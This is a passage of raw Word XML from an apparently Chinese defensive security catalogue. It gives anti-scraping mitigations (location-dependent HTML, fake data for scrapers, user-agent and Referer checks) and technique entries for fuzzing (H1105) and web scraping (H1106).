          <w:p w14:paraId="1FE50BE9" w14:textId="2BCE59F4" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>由于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解析器通过基于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的可识别模式从页面中提取内容来工作，因此我们可以有意识地更改这些模式以打破</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，甚至可以使用它们。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>大多数这些技巧也适用于其他</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，如爬虫和屏幕捕获。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="0B55EDB7" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C18B10A" w14:textId="189E3849" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据用户位置更改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A4CB203" w14:textId="3C11581D" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您根据用户的位置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>国家</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地区（由</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址确定）提供不同的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，则可能会破坏传送给用户的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>例如，如果某人正在编写一个从您的网站上删除数据的移动应用程序，它最初会正常工作，但会在实际分发给用户时中断，因为这些用户可能位于不同的国家</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地区，从而获得不同的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>嵌入式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不是为消耗而设计的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="255D78BF" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1916091D" w14:textId="2F453EF9" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提供虚假信息给</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D684CF6" w14:textId="0ED2F886" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您发现什么是明显的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，您可以提供虚假和无用的数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这将破坏</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从您的网站获取的数据。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您还应该将这些虚假数据与实际数据区分开来，这样</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>就不会知道他们被搞砸了。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="1092A6B6" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3E23C3" w14:textId="636D9359" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>勿接受用户代理为空的请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53EEF0A4" w14:textId="54F1254A" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通常，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不会发送带有请求的用户代理标头，而所有浏览器以及搜索引擎爬虫都会。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="1BF4AD77" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102DBFD6" w14:textId="2DE1462C" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>referer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462531CF" w14:textId="5CBF9D96" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果用户从现场搜索结果页面进入文章页面，请检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Referer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标题是否存在并指向该搜索结果页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F8491A3" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRPr="00A65911" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD3D089" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRPr="0069302E" w:rsidRDefault="006E7D91" w:rsidP="006E7D91"/>
    <w:p w14:paraId="51C080BE" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRPr="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="001A7662"/>
    <w:p w14:paraId="559FF65B" w14:textId="6F60B260" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模糊测试</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="184172C0" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74BAE41C" w14:textId="2BD9A809" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>H1105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB0880C" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CE0B52" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B951A16" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62169AE7" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21DBF9A2" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="0F047314" w14:textId="43D80AA2" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>模糊测试或</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Black Box</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件测试技术，它主要在于以自动方式使用格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>半畸形数据注入查找实现错误。模糊测试的目的依赖于假设存在每个程序中的错误，等待被发现。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，系统化的方法迟早会发现它们。模糊化可以为经典的软件测试技术（手动代码审查，调试）增加另一种观点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E00AC9" w14:textId="60EC895F" w:rsidR="003F6C58" w:rsidRDefault="003F6C58" w:rsidP="003F6C58">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0A922B" w14:textId="1B1DCA74" w:rsidR="003F6C58" w:rsidRDefault="003F6C58" w:rsidP="001A7662">
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能包含所有攻击，请参阅所有其他</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中给出的建议，以确保网络，应用程序和主机的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B06AE" w14:textId="5967AA49" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网页爬虫</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="65387F66" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="248C2671" w14:textId="0CB8FBC2" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>H1106</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B60091B" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FAB7FBD" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61504276" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1289AC" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="437C45D2" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="118F53FF" w14:textId="0C21F466" w:rsidR="001A7662" w:rsidRPr="00A0413E" w:rsidRDefault="00B15FED" w:rsidP="001A7662">
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从应用程序收集可访问的数据和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或处理的输出。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些抓取可能使用虚假或受损帐户，或者可以在无需身份验证的情况下访问该信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刮刀可以尝试读取网页和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有可访问路径和参数值，收集响应并从中提取数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爬取可以实时发生，或者更具周期性。</w:t>
      </w:r>
